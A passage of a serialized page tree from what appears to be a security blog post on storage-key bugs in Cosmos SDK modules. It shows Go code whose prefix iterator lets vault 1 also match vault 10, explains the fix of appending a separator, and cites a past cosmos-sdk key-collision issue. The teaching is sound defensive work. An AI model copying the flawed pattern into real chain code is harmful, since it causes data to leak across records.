584},[90988],{"type":32,"value":90989},"    values",{"type":26,"tag":137,"props":90991,"children":90992},{"style":5590},[90993],{"type":32,"value":79019},{"type":26,"tag":137,"props":90995,"children":90996},{"style":5573},[90997],{"type":32,"value":52271},{"type":26,"tag":137,"props":90999,"children":91000},{"style":5601},[91001],{"type":32,"value":3016},{"type":26,"tag":137,"props":91003,"children":91004},{"style":6009},[91005],{"type":32,"value":87754},{"type":26,"tag":137,"props":91007,"children":91008},{"style":5601},[91009],{"type":32,"value":3079},{"type":26,"tag":137,"props":91011,"children":91012},{"style":5573},[91013],{"type":32,"value":69703},{"type":26,"tag":137,"props":91015,"children":91016},{"style":5601},[91017],{"type":32,"value":3016},{"type":26,"tag":137,"props":91019,"children":91020},{"style":6009},[91021],{"type":32,"value":87771},{"type":26,"tag":137,"props":91023,"children":91024},{"style":5601},[91025],{"type":32,"value":3079},{"type":26,"tag":137,"props":91027,"children":91028},{"style":6009},[91029],{"type":32,"value":90977},{"type":26,"tag":137,"props":91031,"children":91032},{"style":5601},[91033],{"type":32,"value":80699},{"type":26,"tag":137,"props":91035,"children":91036},{"class":5559,"line":5745},[91037,91042,91046,91050,91054,91059],{"type":26,"tag":137,"props":91038,"children":91039},{"style":5584},[91040],{"type":32,"value":91041},"    i",{"type":26,"tag":137,"props":91043,"children":91044},{"style":5590},[91045],{"type":32,"value":79019},{"type":26,"tag":137,"props":91047,"children":91048},{"style":5584},[91049],{"type":32,"value":81243},{"type":26,"tag":137,"props":91051,"children":91052},{"style":5601},[91053],{"type":32,"value":470},{"type":26,"tag":137,"props":91055,"children":91056},{"style":5682},[91057],{"type":32,"value":91058},"KVStorePrefixIterator",{"type":26,"tag":137,"props":91060,"children":91061},{"style":5601},[91062],{"type":32,"value":6054},{"type":26,"tag":137,"props":91064,"children":91065},{"class":5559,"line":5850},[91066,91071],{"type":26,"tag":137,"props":91067,"children":91068},{"style":5584},[91069],{"type":32,"value":91070},"        kvStore",{"type":26,"tag":137,"props":91072,"children":91073},{"style":5601},[91074],{"type":32,"value":6099},{"type":26,"tag":137,"props":91076,"children":91077},{"class":5559,"line":5878},[91078,91083,91087,91091,91095,91100,91104,91109,91113,91117],{"type":26,"tag":137,"props":91079,"children":91080},{"style":5584},[91081],{"type":32,"value":91082},"        fmt",{"type":26,"tag":137,"props":91084,"children":91085},{"style":5601},[91086],{"type":32,"value":470},{"type":26,"tag":137,"props":91088,"children":91089},{"style":5682},[91090],{"type":32,"value":87825},{"type":26,"tag":137,"props":91092,"children":91093},{"style":5601},[91094],{"type":32,"value":165},{"type":26,"tag":137,"props":91096,"children":91097},{"style":6837},[91098],{"type":32,"value":91099},"\"%s%d\"",{"type":26,"tag":137,"props":91101,"children":91102},{"style":5601},[91103],{"type":32,"value":1108},{"type":26,"tag":137,"props":91105,"children":91106},{"style":5584},[91107],{"type":32,"value":91108},"PositionMapPrefix",{"type":26,"tag":137,"props":91110,"children":91111},{"style":5601},[91112],{"type":32,"value":1108},{"type":26,"tag":137,"props":91114,"children":91115},{"style":5584},[91116],{"type":32,"value":90893},{"type":26,"tag":137,"props":91118,"children":91119},{"style":5601},[91120],{"type":32,"value":5742},{"type":26,"tag":137,"props":91122,"children":91123},{"class":5559,"line":5891},[91124],{"type":26,"tag":137,"props":91125,"children":91126},{"style":5601},[91127],{"type":32,"value":26510},{"type":26,"tag":137,"props":91129,"children":91130},{"class":5559,"line":5909},[91131,91135,91140,91144,91148,91153,91157,91161,91165,91170],{"type":26,"tag":137,"props":91132,"children":91133},{"style":5610},[91134],{"type":32,"value":5613},{"type":26,"tag":137,"props":91136,"children":91137},{"style":5601},[91138],{"type":32,"value":91139}," ; ",{"type":26,"tag":137,"props":91141,"children":91142},{"style":5584},[91143],{"type":32,"value":506},{"type":26,"tag":137,"props":91145,"children":91146},{"style":5601},[91147],{"type":32,"value":470},{"type":26,"tag":137,"props":91149,"children":91150},{"style":5682},[91151],{"type":32,"value":91152},"Valid",{"type":26,"tag":137,"props":91154,"children":91155},{"style":5601},[91156],{"type":32,"value":31041},{"type":26,"tag":137,"props":91158,"children":91159},{"style":5584},[91160],{"type":32,"value":506},{"type":26,"tag":137,"props":91162,"children":91163},{"style":5601},[91164],{"type":32,"value":470},{"type":26,"tag":137,"props":91166,"children":91167},{"style":5682},[91168],{"type":32,"value":91169},"Next",{"type":26,"tag":137,"props":91171,"children":91172},{"style":5601},[91173],{"type":32,"value":18328},{"type":26,"tag":137,"props":91175,"children":91176},{"class":5559,"line":5930},[91177,91182,91186,91191,91195,91199,91203,91207,91211,91216,91220,91225],{"type":26,"tag":137,"props":91178,"children":91179},{"style":5584},[91180],{"type":32,"value":91181},"        k",{"type":26,"tag":137,"props":91183,"children":91184},{"style":5590},[91185],{"type":32,"value":79019},{"type":26,"tag":137,"props":91187,"children":91188},{"style":5584},[91189],{"type":32,"value":91190}," strings",{"type":26,"tag":137,"props":91192,"children":91193},{"style":5601},[91194],{"type":32,"value":470},{"type":26,"tag":137,"props":91196,"children":91197},{"style":5682},[91198],{"type":32,"value":72644},{"type":26,"tag":137,"props":91200,"children":91201},{"style":5601},[91202],{"type":32,"value":165},{"type":26,"tag":137,"props":91204,"children":91205},{"style":5584},[91206],{"type":32,"value":506},{"type":26,"tag":137,"props":91208,"children":91209},{"style":5601},[91210],{"type":32,"value":470},{"type":26,"tag":137,"props":91212,"children":91213},{"style":5682},[91214],{"type":32,"value":91215},"Key",{"type":26,"tag":137,"props":91217,"children":91218},{"style":5601},[91219],{"type":32,"value":20968},{"type":26,"tag":137,"props":91221,"children":91222},{"style":5584},[91223],{"type":32,"value":91224},"Seperator",{"type":26,"tag":137,"props":91226,"children":91227},{"style":5601},[91228],{"type":32,"value":5742},{"type":26,"tag":137,"props":91230,"children":91231},{"class":5559,"line":5939},[91232],{"type":26,"tag":137,"props":91233,"children":91234},{"emptyLinePlaceholder":18},[91235],{"type":32,"value":6276},{"type":26,"tag":137,"props":91237,"children":91238},{"class":5559,"line":6191},[91239,91244,91248,91252,91257,91261,91265,91269,91273,91278,91282,91287,91291,91295],{"type":26,"tag":137,"props":91240,"children":91241},{"style":5584},[91242],{"type":32,"value":91243},"        username",{"type":26,"tag":137,"props":91245,"children":91246},{"style":5590},[91247],{"type":32,"value":79019},{"type":26,"tag":137,"props":91249,"children":91250},{"style":5682},[91251],{"type":32,"value":88166},{"type":26,"tag":137,"props":91253,"children":91254},{"style":5601},[91255],{"type":32,"value":91256},"([]",{"type":26,"tag":137,"props":91258,"children":91259},{"style":6009},[91260],{"type":32,"value":87367},{"type":26,"tag":137,"props":91262,"children":91263},{"style":5601},[91264],{"type":32,"value":1108},{"type":26,"tag":137,"props":91266,"children":91267},{"style":5584},[91268],{"type":32,"value":88239},{"type":26,"tag":137,"props":91270,"children":91271},{"style":5601},[91272],{"type":32,"value":470},{"type":26,"tag":137,"props":91274,"children":91275},{"style":5682},[91276],{"type":32,"value":91277},"DecodedLen",{"type":26,"tag":137,"props":91279,"children":91280},{"style":5601},[91281],{"type":32,"value":165},{"type":26,"tag":137,"props":91283,"children":91284},{"style":5584},[91285],{"type":32,"value":91286},"k",{"type":26,"tag":137,"props":91288,"children":91289},{"style":5601},[91290],{"type":32,"value":3016},{"type":26,"tag":137,"props":91292,"children":91293},{"style":5626},[91294],{"type":32,"value":1817},{"type":26,"tag":137,"props":91296,"children":91297},{"style":5601},[91298],{"type":32,"value":91299},"]))\n",{"type":26,"tag":137,"props":91301,"children":91302},{"class":5559,"line":6208},[91303,91307,91311,91315,91319,91324,91328,91333,91337,91341,91345,91349,91353,91357],{"type":26,"tag":137,"props":91304,"children":91305},{"style":5584},[91306],{"type":32,"value":30340},{"type":26,"tag":137,"props":91308,"children":91309},{"style":5601},[91310],{"type":32,"value":1108},{"type":26,"tag":137,"props":91312,"children":91313},{"style":5584},[91314],{"type":32,"value":51022},{"type":26,"tag":137,"props":91316,"children":91317},{"style":5590},[91318],{"type":32,"value":79019},{"type":26,"tag":137,"props":91320,"children":91321},{"style":5584},[91322],{"type":32,"value":91323}," hex",{"type":26,"tag":137,"props":91325,"children":91326},{"style":5601},[91327],{"type":32,"value":470},{"type":26,"tag":137,"props":91329,"children":91330},{"style":5682},[91331],{"type":32,"value":91332},"Decode",{"type":26,"tag":137,"props":91334,"children":91335},{"style":5601},[91336],{"type":32,"value":165},{"type":26,"tag":137,"props":91338,"children":91339},{"style":5584},[91340],{"type":32,"value":88073},{"type":26,"tag":137,"props":91342,"children":91343},{"style":5601},[91344],{"type":32,"value":1108},{"type":26,"tag":137,"props":91346,"children":91347},{"style":5584},[91348],{"type":32,"value":91286},{"type":26,"tag":137,"props":91350,"children":91351},{"style":5601},[91352],{"type":32,"value":3016},{"type":26,"tag":137,"props":91354,"children":91355},{"style":5626},[91356],{"type":32,"value":1817},{"type":26,"tag":137,"props":91358,"children":91359},{"style":5601},[91360],{"type":32,"value":58043},{"type":26,"tag":137,"props":91362,"children":91363},{"class":5559,"line":6225},[91364,91368,91372,91376,91380],{"type":26,"tag":137,"props":91365,"children":91366},{"style":5610},[91367],{"type":32,"value":5856},{"type":26,"tag":137,"props":91369,"children":91370},{"style":5584},[91371],{"type":32,"value":51123},{"type":26,"tag":137,"props":91373,"children":91374},{"style":5590},[91375],{"type":32,"value":66987},{"type":26,"tag":137,"props":91377,"children":91378},{"style":5573},[91379],{"type":32,"value":84520},{"type":26,"tag":137,"props":91381,"children":91382},{"style":5601},[91383],{"type":32,"value":5875},{"type":26,"tag":137,"props":91385,"children":91386},{"class":5559,"line":6238},[91387,91391,91395,91399],{"type":26,"tag":137,"props":91388,"children":91389},{"style":5610},[91390],{"type":32,"value":81678},{"type":26,"tag":137,"props":91392,"children":91393},{"style":5573},[91394],{"type":32,"value":84520},{"type":26,"tag":137,"props":91396,"children":91397},{"style":5601},[91398],{"type":32,"value":1108},{"type":26,"tag":137,"props":91400,"children":91401},{"style":5584},[91402],{"type":32,"value":86241},{"type":26,"tag":137,"props":91404,"children":91405},{"class":5559,"line":6247},[91406],{"type":26,"tag":137,"props":91407,"children":91408},{"style":5601},[91409],{"type":32,"value":5936},{"type":26,"tag":137,"props":91411,"children":91412},{"class":5559,"line":6270},[91413],{"type":26,"tag":137,"props":91414,"children":91415},{"emptyLinePlaceholder":18},[91416],{"type":32,"value":6276},{"type":26,"tag":137,"props":91418,"children":91419},{"class":5559,"line":6279},[91420,91425,91429,91433,91437,91441,91445,91449,91453,91457,91461,91465,91469,91473],{"type":26,"tag":137,"props":91421,"children":91422},{"style":5584},[91423],{"type":32,"value":91424},"        positionName",{"type":26,"tag":137,"props":91426,"children":91427},{"style":5590},[91428],{"type":32,"value":79019},{"type":26,"tag":137,"props":91430,"children":91431},{"style":5682},[91432],{"type":32,"value":88166},{"type":26,"tag":137,"props":91434,"children":91435},{"style":5601},[91436],{"type":32,"value":91256},{"type":26,"tag":137,"props":91438,"children":91439},{"style":6009},[91440],{"type":32,"value":87367},{"type":26,"tag":137,"props":91442,"children":91443},{"style":5601},[91444],{"type":32,"value":1108},{"type":26,"tag":137,"props":91446,"children":91447},{"style":5584},[91448],{"type":32,"value":88239},{"type":26,"tag":137,"props":91450,"children":91451},{"style":5601},[91452],{"type":32,"value":470},{"type":26,"tag":137,"props":91454,"children":91455},{"style":5682},[91456],{"type":32,"value":91277},{"type":26,"tag":137,"props":91458,"children":91459},{"style":5601},[91460],{"type":32,"value":165},{"type":26,"tag":137,"props":91462,"children":91463},{"style":5584},[91464],{"type":32,"value":91286},{"type":26,"tag":137,"props":91466,"children":91467},{"style":5601},[91468],{"type":32,"value":3016},{"type":26,"tag":137,"props":91470,"children":91471},{"style":5626},[91472],{"type":32,"value":878},{"type":26,"tag":137,"props":91474,"children":91475},{"style":5601},[91476],{"type":32,"value":91299},{"type":26,"tag":137,"props":91478,"children":91479},{"class":5559,"line":6288},[91480,91484,91488,91492,91496,91500,91504,91508,91512,91516,91520,91524,91528,91532],{"type":26,"tag":137,"props":91481,"children":91482},{"style":5584},[91483],{"type":32,"value":30340},{"type":26,"tag":137,"props":91485,"children":91486},{"style":5601},[91487],{"type":32,"value":1108},{"type":26,"tag":137,"props":91489,"children":91490},{"style":5584},[91491],{"type":32,"value":51022},{"type":26,"tag":137,"props":91493,"children":91494},{"style":5590},[91495],{"type":32,"value":79019},{"type":26,"tag":137,"props":91497,"children":91498},{"style":5584},[91499],{"type":32,"value":91323},{"type":26,"tag":137,"props":91501,"children":91502},{"style":5601},[91503],{"type":32,"value":470},{"type":26,"tag":137,"props":91505,"children":91506},{"style":5682},[91507],{"type":32,"value":91332},{"type":26,"tag":137,"props":91509,"children":91510},{"style":5601},[91511],{"type":32,"value":165},{"type":26,"tag":137,"props":91513,"children":91514},{"style":5584},[91515],{"type":32,"value":88342},{"type":26,"tag":137,"props":91517,"children":91518},{"style":5601},[91519],{"type":32,"value":1108},{"type":26,"tag":137,"props":91521,"children":91522},{"style":5584},[91523],{"type":32,"value":91286},{"type":26,"tag":137,"props":91525,"children":91526},{"style":5601},[91527],{"type":32,"value":3016},{"type":26,"tag":137,"props":91529,"children":91530},{"style":5626},[91531],{"type":32,"value":878},{"type":26,"tag":137,"props":91533,"children":91534},{"style":5601},[91535],{"type":32,"value":58043},{"type":26,"tag":137,"props":91537,"children":91538},{"class":5559,"line":6355},[91539,91543,91547,91551,91555],{"type":26,"tag":137,"props":91540,"children":91541},{"style":5610},[91542],{"type":32,"value":5856},{"type":26,"tag":137,"props":91544,"children":91545},{"style":5584},[91546],{"type":32,"value":51123},{"type":26,"tag":137,"props":91548,"children":91549},{"style":5590},[91550],{"type":32,"value":66987},{"type":26,"tag":137,"props":91552,"children":91553},{"style":5573},[91554],{"type":32,"value":84520},{"type":26,"tag":137,"props":91556,"children":91557},{"style":5601},[91558],{"type":32,"value":5875},{"type":26,"tag":137,"props":91560,"children":91561},{"class":5559,"line":6363},[91562,91566,91570,91574],{"type":26,"tag":137,"props":91563,"children":91564},{"style":5610},[91565],{"type":32,"value":81678},{"type":26,"tag":137,"props":91567,"children":91568},{"style":5573},[91569],{"type":32,"value":84520},{"type":26,"tag":137,"props":91571,"children":91572},{"style":5601},[91573],{"type":32,"value":1108},{"type":26,"tag":137,"props":91575,"children":91576},{"style":5584},[91577],{"type":32,"value":86241},{"type":26,"tag":137,"props":91579,"children":91580},{"class":5559,"line":6393},[91581],{"type":26,"tag":137,"props":91582,"children":91583},{"style":5601},[91584],{"type":32,"value":5936},{"type":26,"tag":137,"props":91586,"children":91587},{"class":5559,"line":6401},[91588],{"type":26,"tag":137,"props":91589,"children":91590},{"emptyLinePlaceholder":18},[91591],{"type":32,"value":6276},{"type":26,"tag":137,"props":91593,"children":91594},{"class":5559,"line":6433},[91595,91599,91603,91607,91611,91615,91620,91624,91628,91633,91637,91641],{"type":26,"tag":137,"props":91596,"children":91597},{"style":5610},[91598],{"type":32,"value":5856},{"type":26,"tag":137,"props":91600,"children":91601},{"style":5584},[91602],{"type":32,"value":65242},{"type":26,"tag":137,"props":91604,"children":91605},{"style":5601},[91606],{"type":32,"value":1108},{"type":26,"tag":137,"props":91608,"children":91609},{"style":5584},[91610],{"type":32,"value":81369},{"type":26,"tag":137,"props":91612,"children":91613},{"style":5590},[91614],{"type":32,"value":79019},{"type":26,"tag":137,"props":91616,"children":91617},{"style":5584},[91618],{"type":32,"value":91619}," values",{"type":26,"tag":137,"props":91621,"children":91622},{"style":5601},[91623],{"type":32,"value":3016},{"type":26,"tag":137,"props":91625,"children":91626},{"style":5584},[91627],{"type":32,"value":88073},{"type":26,"tag":137,"props":91629,"children":91630},{"style":5601},[91631],{"type":32,"value":91632},"]; ",{"type":26,"tag":137,"props":91634,"children":91635},{"style":5590},[91636],{"type":32,"value":23215},{"type":26,"tag":137,"props":91638,"children":91639},{"style":5584},[91640],{"type":32,"value":81369},{"type":26,"tag":137,"props":91642,"children":91643},{"style":5601},[91644],{"type":32,"value":5875},{"type":26,"tag":137,"props":91646,"children":91647},{"class":5559,"line":6441},[91648,91653,91657,91661,91665,91669,91673,91677,91681,91685,91689],{"type":26,"tag":137,"props":91649,"children":91650},{"style":5584},[91651],{"type":32,"value":91652},"            values",{"type":26,"tag":137,"props":91654,"children":91655},{"style":5601},[91656],{"type":32,"value":3016},{"type":26,"tag":137,"props":91658,"children":91659},{"style":5584},[91660],{"type":32,"value":88073},{"type":26,"tag":137,"props":91662,"children":91663},{"style":5601},[91664],{"type":32,"value":11247},{"type":26,"tag":137,"props":91666,"children":91667},{"style":5590},[91668],{"type":32,"value":289},{"type":26,"tag":137,"props":91670,"children":91671},{"style":5682},[91672],{"type":32,"value":88166},{"type":26,"tag":137,"props":91674,"children":91675},{"style":5601},[91676],{"type":32,"value":165},{"type":26,"tag":137,"props":91678,"children":91679},{"style":5573},[91680],{"type":32,"value":69703},{"type":26,"tag":137,"props":91682,"children":91683},{"style":5601},[91684],{"type":32,"value":3016},{"type":26,"tag":137,"props":91686,"children":91687},{"style":6009},[91688],{"type":32,"value":87771},{"type":26,"tag":137,"props":91690,"children":91691},{"style":5601},[91692],{"type":32,"value":58043},{"type":26,"tag":137,"props":91694,"children":91695},{"class":5559,"line":6501},[91696],{"type":26,"tag":137,"props":91697,"children":91698},{"style":5601},[91699],{"type":32,"value":5936},{"type":26,"tag":137,"props":91701,"children":91702},{"class":5559,"line":11634},[91703],{"type":26,"tag":137,"props":91704,"children":91705},{"emptyLinePlaceholder":18},[91706],{"type":32,"value":6276},{"type":26,"tag":137,"props":91708,"children":91709},{"class":5559,"line":11652},[91710,91715,91719,91723,91727,91731,91735,91739,91743],{"type":26,"tag":137,"props":91711,"children":91712},{"style":5584},[91713],{"type":32,"value":91714},"        values",{"type":26,"tag":137,"props":91716,"children":91717},{"style":5601},[91718],{"type":32,"value":3016},{"type":26,"tag":137,"props":91720,"children":91721},{"style":5584},[91722],{"type":32,"value":88073},{"type":26,"tag":137,"props":91724,"children":91725},{"style":5601},[91726],{"type":32,"value":51560},{"type":26,"tag":137,"props":91728,"children":91729},{"style":5584},[91730],{"type":32,"value":88342},{"type":26,"tag":137,"props":91732,"children":91733},{"style":5601},[91734],{"type":32,"value":11247},{"type":26,"tag":137,"props":91736,"children":91737},{"style":5590},[91738],{"type":32,"value":289},{"type":26,"tag":137,"props":91740,"children":91741},{"style":5584},[91742],{"type":32,"value":10009},{"type":26,"tag":137,"props":91744,"children":91745},{"style":5601},[91746],{"type":32,"value":5875},{"type":26,"tag":137,"props":91748,"children":91749},{"class":5559,"line":11697},[91750,91754,91758,91763,91767,91772],{"type":26,"tag":137,"props":91751,"children":91752},{"style":5584},[91753],{"type":32,"value":29543},{"type":26,"tag":137,"props":91755,"children":91756},{"style":5601},[91757],{"type":32,"value":17923},{"type":26,"tag":137,"props":91759,"children":91760},{"style":5584},[91761],{"type":32,"value":91762},"iterator",{"type":26,"tag":137,"props":91764,"children":91765},{"style":5601},[91766],{"type":32,"value":470},{"type":26,"tag":137,"props":91768,"children":91769},{"style":5682},[91770],{"type":32,"value":91771},"Value",{"type":26,"tag":137,"props":91773,"children":91774},{"style":5601},[91775],{"type":32,"value":6082},{"type":26,"tag":137,"props":91777,"children":91778},{"class":5559,"line":11803},[91779],{"type":26,"tag":137,"props":91780,"children":91781},{"style":5601},[91782],{"type":32,"value":5936},{"type":26,"tag":137,"props":91784,"children":91785},{"class":5559,"line":26089},[91786],{"type":26,"tag":137,"props":91787,"children":91788},{"style":5601},[91789],{"type":32,"value":5945},{"type":26,"tag":137,"props":91791,"children":91792},{"class":5559,"line":26124},[91793,91797],{"type":26,"tag":137,"props":91794,"children":91795},{"style":5610},[91796],{"type":32,"value":19582},{"type":26,"tag":137,"props":91798,"children":91799},{"style":5584},[91800],{"type":32,"value":91801}," values\n",{"type":26,"tag":137,"props":91803,"children":91804},{"class":5559,"line":26132},[91805],{"type":26,"tag":137,"props":91806,"children":91807},{"style":5601},[91808],{"type":32,"value":6507},{"type":26,"tag":35,"props":91810,"children":91811},{},[91812,91814,91820,91821,91827,91829,91834,91836,91841,91843,91848,91850,91856,91858,91864],{"type":32,"value":91813},"By now, you may have already noticed that this implementation suffers from field malleability issues. Imagine a scenario where both ",{"type":26,"tag":130,"props":91815,"children":91817},{"className":91816},[],[91818],{"type":32,"value":91819},"vaultId = 1",{"type":32,"value":3339},{"type":26,"tag":130,"props":91822,"children":91824},{"className":91823},[],[91825],{"type":32,"value":91826},"vaultId = 10",{"type":32,"value":91828}," coexist. If we try to fetch data under ",{"type":26,"tag":130,"props":91830,"children":91832},{"className":91831},[],[91833],{"type":32,"value":91819},{"type":32,"value":91835},", all entries under ",{"type":26,"tag":130,"props":91837,"children":91839},{"className":91838},[],[91840],{"type":32,"value":91826},{"type":32,"value":91842}," will also be returned simply because ",{"type":26,"tag":130,"props":91844,"children":91846},{"className":91845},[],[91847],{"type":32,"value":878},{"type":32,"value":91849}," is a prefix of ",{"type":26,"tag":130,"props":91851,"children":91853},{"className":91852},[],[91854],{"type":32,"value":91855},"10",{"type":32,"value":91857},". To fix this, we must once again append the ",{"type":26,"tag":130,"props":91859,"children":91861},{"className":91860},[],[91862],{"type":32,"value":91863},"Separator",{"type":32,"value":91865}," to the iterator prefix.",{"type":26,"tag":5512,"props":91867,"children":91869},{"code":91868,"language":78767,"meta":7,"className":78768,"style":7},"i := sdk.KVStorePrefixIterator(\n    kvStore,\n    fmt.Sprintf(\"%s%d%s\", PositionMapPrefix, vaultId, Seperator),\n)\n",[91870],{"type":26,"tag":130,"props":91871,"children":91872},{"__ignoreMap":7},[91873,91900,91912,91965],{"type":26,"tag":137,"props":91874,"children":91875},{"class":5559,"line":5560},[91876,91880,91884,91888,91892,91896],{"type":26,"tag":137,"props":91877,"children":91878},{"style":5584},[91879],{"type":32,"value":506},{"type":26,"tag":137,"props":91881,"children":91882},{"style":5590},[91883],{"type":32,"value":79019},{"type":26,"tag":137,"props":91885,"children":91886},{"style":5584},[91887],{"type":32,"value":81243},{"type":26,"tag":137,"props":91889,"children":91890},{"style":5601},[91891],{"type":32,"value":470},{"type":26,"tag":137,"props":91893,"children":91894},{"style":5682},[91895],{"type":32,"value":91058},{"type":26,"tag":137,"props":91897,"children":91898},{"style":5601},[91899],{"type":32,"value":6054},{"type":26,"tag":137,"props":91901,"children":91902},{"class":5559,"line":5412},[91903,91908],{"type":26,"tag":137,"props":91904,"children":91905},{"style":5584},[91906],{"type":32,"value":91907},"    kvStore",{"type":26,"tag":137,"props":91909,"children":91910},{"style":5601},[91911],{"type":32,"value":6099},{"type":26,"tag":137,"props":91913,"children":91914},{"class":5559,"line":5417},[91915,91920,91924,91928,91932,91937,91941,91945,91949,91953,91957,91961],{"type":26,"tag":137,"props":91916,"children":91917},{"style":5584},[91918],{"type":32,"value":91919},"    fmt",{"type":26,"tag":137,"props":91921,"children":91922},{"style":5601},[91923],{"type":32,"value":470},{"type":26,"tag":137,"props":91925,"children":91926},{"style":5682},[91927],{"type":32,"value":87825},{"type":26,"tag":137,"props":91929,"children":91930},{"style":5601},[91931],{"type":32,"value":165},{"type":26,"tag":137,"props":91933,"children":91934},{"style":6837},[91935],{"type":32,"value":91936},"\"%s%d%s\"",{"type":26,"tag":137,"props":91938,"children":91939},{"style":5601},[91940],{"type":32,"value":1108},{"type":26,"tag":137,"props":91942,"children":91943},{"style":5584},[91944],{"type":32,"value":91108},{"type":26,"tag":137,"props":91946,"children":91947},{"style":5601},[91948],{"type":32,"value":1108},{"type":26,"tag":137,"props":91950,"children":91951},{"style":5584},[91952],{"type":32,"value":90893},{"type":26,"tag":137,"props":91954,"children":91955},{"style":5601},[91956],{"type":32,"value":1108},{"type":26,"tag":137,"props":91958,"children":91959},{"style":5584},[91960],{"type":32,"value":91224},{"type":26,"tag":137,"props":91962,"children":91963},{"style":5601},[91964],{"type":32,"value":9320},{"type":26,"tag":137,"props":91966,"children":91967},{"class":5559,"line":5642},[91968],{"type":26,"tag":137,"props":91969,"children":91970},{"style":5601},[91971],{"type":32,"value":5742},{"type":26,"tag":35,"props":91973,"children":91974},{},[91975,91977,91982],{"type":32,"value":91976},"At first, identifying these serialization issues may seem easy. Once data structures and ",{"type":26,"tag":130,"props":91978,"children":91980},{"className":91979},[],[91981],{"type":32,"value":87579},{"type":32,"value":91983}," usage grow increasingly more complex, developers can unintentionally overlook storage key parsing mistakes.",{"type":26,"tag":35,"props":91985,"children":91986},{},[91987],{"type":32,"value":91988},"Storage keys continue to be a tedious and persistent issue when building on Cosmos. It is crucial to approach development with awareness and care to prevent bugs from creeping into code.",{"type":26,"tag":118,"props":91990,"children":91992},{"id":91991},"real-world-examples-5",[91993],{"type":32,"value":79292},{"type":26,"tag":35,"props":91995,"children":91996},{},[91997,91998,92003,92005,92012,92014,92020],{"type":32,"value":19206},{"type":26,"tag":130,"props":91999,"children":92001},{"className":92000},[],[92002],{"type":32,"value":81064},{"type":32,"value":92004}," previously lacked protection against KVStore ",{"type":26,"tag":41,"props":92006,"children":92009},{"href":92007,"rel":92008},"https://github.com/cosmos/cosmos-sdk/pull/9363",[45],[92010],{"type":32,"value":92011},"key collisions",{"type":32,"value":92013},". This prior oversight allowed developers to unintentionally create two ",{"type":26,"tag":130,"props":92015,"children":92017},{"className":92016},[],[92018],{"type":32,"value":92019},"KVStores",{"type":32,"value":92021}," that were not independent of each other.",{"type":26,"tag":35,"props":92023,"children":92024},{},[92025],{"type":26,"tag":41,"props":92026,"children":92029},{"href":92027,"rel":92028},"https://github.com/cosmos/cosmos-sdk/blob/25bd118e4cc1d60ab2f9d2e0302d271416551aa9/types/store.go#L108",[45],[92030],{"type":32,"value":79342},{"type":26,"tag":5512,"props":92032,"children":92034},{"code":92033,"language":78767,"meta":7,"className":78768,"style":7},"func NewKVStoreKeys(names ...string) map[string]*KVStoreKey {\n    keys := make(map[string]*KVStoreKey)\n    for _, name := range names {\n        keys[name] = NewKVStoreKey(name)\n    }\n\n    return keys\n}\n",[92035],{"type":26,"tag":130,"props":92036,"children":92037},{"__ignoreMap":7},[92038,92100,92148,92184,92224,92231,92238,92250],{"type":26,"tag":137,"props":92039,"children":92040},{"class":5559,"line":5560},[92041,92045,92050,92054,92059,92063,92067,92071,92075,92079,92083,92087,92091,92096],{"type":26,"tag":137,"props":92042,"children":92043},{"style":5573},[92044],{"type":32,"value":78903},{"type":26,"tag":137,"props":92046,"children":92047},{"style":5682},[92048],{"type":32,"value":92049}," NewKVStoreKeys",{"type":26,"tag":137,"props":92051,"children":92052},{"style":5601},[92053],{"type":32,"value":165},{"type":26,"tag":137,"props":92055,"children":92056},{"style":5584},[92057],{"type":32,"value":92058},"names",{"type":26,"tag":137,"props":92060,"children":92061},{"style":5590},[92062],{"type":32,"value":27891},{"type":26,"tag":137,"props":92064,"children":92065},{"style":6009},[92066],{"type":32,"value":32260},{"type":26,"tag":137,"props":92068,"children":92069},{"style":5601},[92070],{"type":32,"value":5671},{"type":26,"tag":137,"props":92072,"children":92073},{"style":5573},[92074],{"type":32,"value":69703},{"type":26,"tag":137,"props":92076,"children":92077},{"style":5601},[92078],{"type":32,"value":3016},{"type":26,"tag":137,"props":92080,"children":92081},{"style":6009},[92082],{"type":32,"value":32260},{"type":26,"tag":137,"props":92084,"children":92085},{"style":5601},[92086],{"type":32,"value":3079},{"type":26,"tag":137,"props":92088,"children":92089},{"style":5590},[92090],{"type":32,"value":7152},{"type":26,"tag":137,"props":92092,"children":92093},{"style":6009},[92094],{"type":32,"value":92095},"KVStoreKey",{"type":26,"tag":137,"props":92097,"children":92098},{"style":5601},[92099],{"type":32,"value":5875},{"type":26,"tag":137,"props":92101,"children":92102},{"class":5559,"line":5412},[92103,92108,92112,92116,92120,92124,92128,92132,92136,92140,92144],{"type":26,"tag":137,"props":92104,"children":92105},{"style":5584},[92106],{"type":32,"value":92107},"    keys",{"type":26,"tag":137,"props":92109,"children":92110},{"style":5590},[92111],{"type":32,"value":79019},{"type":26,"tag":137,"props":92113,"children":92114},{"style":5682},[92115],{"type":32,"value":88166},{"type":26,"tag":137,"props":92117,"children":92118},{"style":5601},[92119],{"type":32,"value":165},{"type":26,"tag":137,"props":92121,"children":92122},{"style":5573},[92123],{"type":32,"value":69703},{"type":26,"tag":137,"props":92125,"children":92126},{"style":5601},[92127],{"type":32,"value":3016},{"type":26,"tag":137,"props":92129,"children":92130},{"style":6009},[92131],{"type":32,"value":32260},{"type":26,"tag":137,"props":92133,"children":92134},{"style":5601},[92135],{"type":32,"value":3079},{"type":26,"tag":137,"props":92137,"children":92138},{"style":5590},[92139],{"type":32,"value":7152},{"type":26,"tag":137,"props":92141,"children":92142},{"style":6009},[92143],{"type":32,"value":92095},{"type":26,"tag":137,"props":92145,"children":92146},{"style":5601},[92147],{"type":32,"value":5742},{"type":26,"tag":137,"props":92149,"children":92150},{"class":5559,"line":5417},[92151,92155,92159,92163,92167,92171,92175,92180],{"type":26,"tag":137,"props":92152,"children":92153},{"style":5610},[92154],{"type":32,"value":5613},{"type":26,"tag":137,"props":92156,"children":92157},{"style":5584},[92158],{"type":32,"value":5618},{"type":26,"tag":137,"props":92160,"children":92161},{"style":5601},[92162],{"type":32,"value":1108},{"type":26,"tag":137,"props":92164,"children":92165},{"style":5584},[92166],{"type":32,"value":51100},{"type":26,"tag":137,"props":92168,"children":92169},{"style":5590},[92170],{"type":32,"value":79019},{"type":26,"tag":137,"props":92172,"children":92173},{"style":5610},[92174],{"type":32,"value":80001},{"type":26,"tag":137,"props":92176,"children":92177},{"style":5584},[92178],{"type":32,"value":92179}," 